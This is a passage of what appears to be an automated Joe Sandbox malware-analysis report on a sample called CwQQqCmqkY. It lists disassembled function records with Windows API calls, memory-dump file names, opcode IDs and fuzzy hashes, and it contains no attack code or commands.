                      • Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B
                    • GetLocaleInfoW.KERNEL32(?,?,?,00007FF7F1325AA2), ref: 00007FF7F1325D2F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast$InfoLocaleValue
                    • String ID:
                    • API String ID: 3796814847-0
                    • Opcode ID: e615fd6ae1c2058287dc77e0c0a833ba8459180b1a1f03f84716c65aaa9cb3e0
                    • Instruction ID: fa15b9e3423ea3e7bcb3d32989bde516c6dcc89f794e0d26efbe81ff966728f0
                    • Opcode Fuzzy Hash: e615fd6ae1c2058287dc77e0c0a833ba8459180b1a1f03f84716c65aaa9cb3e0
                    • Instruction Fuzzy Hash: 3E115031F1859243E774BF25A0447BDA251EF40760F944635D63D476C4DF69E9838B90
                    APIs
                      • Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
                      • Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
                      • Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B
                    • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7F1325EEB,?,00000000,00000092,?,?,00000000,?,00007FF7F1314C2D), ref: 00007FF7F132588E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystemValue
                    • String ID:
                    • API String ID: 3029459697-0
                    • Opcode ID: ab3c08872e52599da4b5c63f81aa011cbda0d1163b7346b2cff8d05489795113
                    • Instruction ID: 28885dc66df02e37537f1571dd2e3abf13345326fe608a6b56fb51132310578d
                    • Opcode Fuzzy Hash: ab3c08872e52599da4b5c63f81aa011cbda0d1163b7346b2cff8d05489795113
                    • Instruction Fuzzy Hash: F501B572F082C287EB147F15E4407F9BAA1EF507A4F858279D679472C4DFF895818B90
                    APIs
                    • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF7F131C257,?,?,?,?,?,?,?,?,00000000,00007FF7F1324D90), ref: 00007FF7F131BDFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: EnumLocalesSystem
                    • String ID:
                    • API String ID: 2099609381-0
                    • Opcode ID: f51f14732704f7ee42003b3f08c2e67ee626df141659fb0fca109b836753bdf5
                    • Instruction ID: 6f10ca124b7282dc0495617b2165221db7428ce35cfcc446bfa8a4513a207fc3
                    • Opcode Fuzzy Hash: f51f14732704f7ee42003b3f08c2e67ee626df141659fb0fca109b836753bdf5
                    • Instruction Fuzzy Hash: 2EF08172B08B4583E704EB19F8905A5B3B5EF987D0F954039DA6D833A4CFBCD4508394
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Time$FileSystem
                    • String ID:
                    • API String ID: 2086374402-0
                    • Opcode ID: ca957c3dfe7c2af0ac6f8859d1bcb381be185acf46c5f6cefe6904997612c2f9
                    • Instruction ID: 7a408c90d7286258556ae2c8fd06a506d9613adeda658d06f305154853d27259
                    • Opcode Fuzzy Hash: ca957c3dfe7c2af0ac6f8859d1bcb381be185acf46c5f6cefe6904997612c2f9
                    • Instruction Fuzzy Hash: A5F0E2E2B29A8803EF149755A8107A4A2829F5CBF4F00A335ED3D0E7C9EF6CE0908300
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: gfffffff
                    • API String ID: 0-1523873471
                    • Opcode ID: 2561b6827e990c1bdb6b86e7d1e0ce5da4f472f508b9e76e665e23e6ce3723f0
                    • Instruction ID: 797ae2091b25af2493bd2230f7d1376b0409ca8e7744da4ecc39fae75e89cea7
                    • Opcode Fuzzy Hash: 2561b6827e990c1bdb6b86e7d1e0ce5da4f472f508b9e76e665e23e6ce3723f0
                    • Instruction Fuzzy Hash: D3A16563F083C687EB22DB29A0007A9BB91AF50BA4F468135DEAD577C1DB7EE401D351
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 16e2ae31430d18b4ecfef4cf0df7a4c2f446580120bf3df176b47e9a7494e7c2
                    • Instruction ID: 8b2d538c9694801bf0c34ead796045fb9ac21a769b1874aefd22c5bf0b02c905
                    • Opcode Fuzzy Hash: 16e2ae31430d18b4ecfef4cf0df7a4c2f446580120bf3df176b47e9a7494e7c2
                    • Instruction Fuzzy Hash: 7DB18D7290864686E764EF29C05027CBBE1EB49B4CFA4013DCA9E473D5CFB9E845C7A4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 9cbd260e13117f1f5e36382f2f0aff102ea4b683820d97de940a68ce141764bf
                    • Instruction ID: bbd7d4ef26df004f73f0068e1f0594a67a51539ed571a8897718245c35f521a8
                    • Opcode Fuzzy Hash: 9cbd260e13117f1f5e36382f2f0aff102ea4b683820d97de940a68ce141764bf
                    • Instruction Fuzzy Hash: 39B1AD76908B458AE764AF2AC05022CBBE4FF49B4CFA441B9CA5D433E5CFB9D441C7A4
                    APIs
                    • GetLastError.KERNEL32 ref: 00007FF7F1326B75
                      • Part of subcall function 00007FF7F131DE2C: HeapAlloc.KERNEL32(?,?,00000000,00007FF7F131B22E,?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131DE81
                      • Part of subcall function 00007FF7F131B6E0: RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
                      • Part of subcall function 00007FF7F131B6E0: GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700
                      • Part of subcall function 00007FF7F132A524: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F132A557
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 916656526-0
                    • Opcode ID: 610d6efb23af236bbb731a3c30169f1f48c4d23925bb60a0db3c7df5cd19ed7e
                    • Instruction ID: 91bff3d1f78c58b7e3ca079bd559b319b2464b960ad2687d829eaeaaf5270fb5
                    • Opcode Fuzzy Hash: 610d6efb23af236bbb731a3c30169f1f48c4d23925bb60a0db3c7df5cd19ed7e
                    • Instruction Fuzzy Hash: 7141F961F092A343FB70BE2668516BAE290AF85B80F80517DDE6D577C5DFBCE40182E0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: 105c07a39436fc65c96653f7f0e22869ce95d6d0b8187ce922501a3ee5b46d73
                    • Instruction ID: d926bfd1325d3c69ef1e3e4f588235190acb23d6800736db94208069001a506b
                    • Opcode Fuzzy Hash: 105c07a39436fc65c96653f7f0e22869ce95d6d0b8187ce922501a3ee5b46d73
                    • Instruction Fuzzy Hash: 58B09222E0BA06C3EB083B116CC261462A96F98710FD9003CC52C80360DFAC30E6A760
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 401934b12d4d57dff7fbecf44d87034bca62b97aeb0ca5ab5e190bc30e129afc
                    • Instruction ID: e52ff48914c7622e33565e111cf6e2484928abe2d40a793da84e4ada2ece089d
                    • Opcode Fuzzy Hash: 401934b12d4d57dff7fbecf44d87034bca62b97aeb0ca5ab5e190bc30e129afc
                    • Instruction Fuzzy Hash: 1E628B76A086518BD7649F25C08052CB7B1F758F68F655236CE2DC3B89CB78E891CFA0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2e598bfd8f9db23d7f85586f9a9689e9849548091e68750002833d44ca696d9
                    • Instruction ID: 3728ab03e56f21be35a407d24a5dfd21ff14e38bed30d376dbcbc7930d17e9dd
                    • Opcode Fuzzy Hash: b2e598bfd8f9db23d7f85586f9a9689e9849548091e68750002833d44ca696d9
                    • Instruction Fuzzy Hash: 83D1E822E0860687EB68AE2A845023EA7E0EF05B5CF95417DCF2D176D5CFBDD851C7A0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 4023145424-0
                    • Opcode ID: e4724d110090267567c390dc0fc531ad2632116f96ee7341dd939fd0b1a1e8bf
                    • Instruction ID: a0ca48c06a8e4e6d7c6c3fb4aef6b8925a6599399445952afc82b9715231d717
                    • Opcode Fuzzy Hash: e4724d110090267567c390dc0fc531ad2632116f96ee7341dd939fd0b1a1e8bf
                    • Instruction Fuzzy Hash: F6C1EA25E0868246EB60AB61D5103BAA7E0FFA4798FC24039DEADA76C5DFBCD501C350
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: da34ac83b718cb28b224a2d2df496d0cb171177076e7f037eb7ed32ffbaa8632
                    • Instruction ID: ede9ade67ed3b692edf225679a7960c3ab415ad8ab498b18f73b57eddfa21465
                    • Opcode Fuzzy Hash: da34ac83b718cb28b224a2d2df496d0cb171177076e7f037eb7ed32ffbaa8632
                    • Instruction Fuzzy Hash: 85915A26B1828647FB24AA2690103B9A7D0AF5179CF84113CDD7E477C5DFBCE809E7A0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5ebbbd205f20f73f35923b307919996684a53ebed511ccb50f4f1b199549430b
                    • Instruction ID: f90db754463a710c1f6a952f4c76b208f2b01656d0ac079df5a884fc92655865
                    • Opcode Fuzzy Hash: 5ebbbd205f20f73f35923b307919996684a53ebed511ccb50f4f1b199549430b
                    • Instruction Fuzzy Hash: F5A1563272416047D705D72A98688BA73E4FB98359F959136EF99C77C0CB3DE811CBA0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a6d3b5c4de2afde0a3fd61332e5bcf755bdc5ebf2cbac364ee3388e725a938a6
                    • Instruction ID: 32a8baf841d8789d15e67803221312eb4ef47c4cf39d239a00f0c9788c271fb3
                    • Opcode Fuzzy Hash: a6d3b5c4de2afde0a3fd61332e5bcf755bdc5ebf2cbac364ee3388e725a938a6
                    • Instruction Fuzzy Hash: B391D162B18A8582EB149E65D4405BCA360FB54BE0F84923ADE6EC7FC4EF7CE551C380
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 493724b116f5e10b89b84bb2ec4a2a8898ca1882135cc21c34ad25bd87c358c2
                    • Instruction ID: b092e8ec358a5ae6794fa9d5756ad7393033cc7d986611f7cfb046e0ec5f781b
                    • Opcode Fuzzy Hash: 493724b116f5e10b89b84bb2ec4a2a8898ca1882135cc21c34ad25bd87c358c2
                    • Instruction Fuzzy Hash: E9812572E0878147E778EB1994803BAB694FF4A7A4F854239DAAD53BC9CF7CD0058B50
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: fab6f0e58bcffe6acf1ee0e26bd071f9deeffe126abb9c8078ac0c4272275751
                    • Instruction ID: f4dae0427a669593e118d91a747de1d9bf7771b592af0b73b42fdd6292837e9c
                    • Opcode Fuzzy Hash: fab6f0e58bcffe6acf1ee0e26bd071f9deeffe126abb9c8078ac0c4272275751
                    • Instruction Fuzzy Hash: 2961E623E1829247FB64A93984507F9EAD1AF40770F96423DDA3E526C5DFEDE84087E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                    • Instruction ID: ef63371e72c5b25c40d132f1cf3d55a65c8c25c6f3a82ec12f2629403c6bf484
                    • Opcode Fuzzy Hash: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                    • Instruction Fuzzy Hash: 02519C72A18A5187E7259B29C041228A7E0EF44B5CFA88179CE9D177D5CBBAF843C7D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
                    • Instruction ID: fd9105e3b9b9db1ddd089e63b447d95016ec46aef8e3d7846c6e4570f95699b9
                    • Opcode Fuzzy Hash: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
                    • Instruction Fuzzy Hash: 4251BF36A1869587E7249B29C040268B3E0EF45B6CFA44139CA9E177E4CB7AF843C7D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                    • Instruction ID: 639c91d22c3c45a5030a3580d21f9e0c62022863562dd9c286a48e1ecbb46459
                    • Opcode Fuzzy Hash: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                    • Instruction Fuzzy Hash: F8516D36A1865187E7249B29C040238B7E0EF44F9CFA44139CADD57BD5CBBAF952C7A0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 485612231-0
                    • Opcode ID: 4dc98e98a207682aab6e57f1db6fda77afefcc61d6e7491bdb94e614b2e4e211
                    • Instruction ID: b703884841c812907287c33a992b639c18667044a33a23db98666ed1ed3668de
                    • Opcode Fuzzy Hash: 4dc98e98a207682aab6e57f1db6fda77afefcc61d6e7491bdb94e614b2e4e211
                    • Instruction Fuzzy Hash: A8411472B14A5482EF04DF2AD914569B3A1BB49FE0F8A903AEE5D97B98DF7CC4418340
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
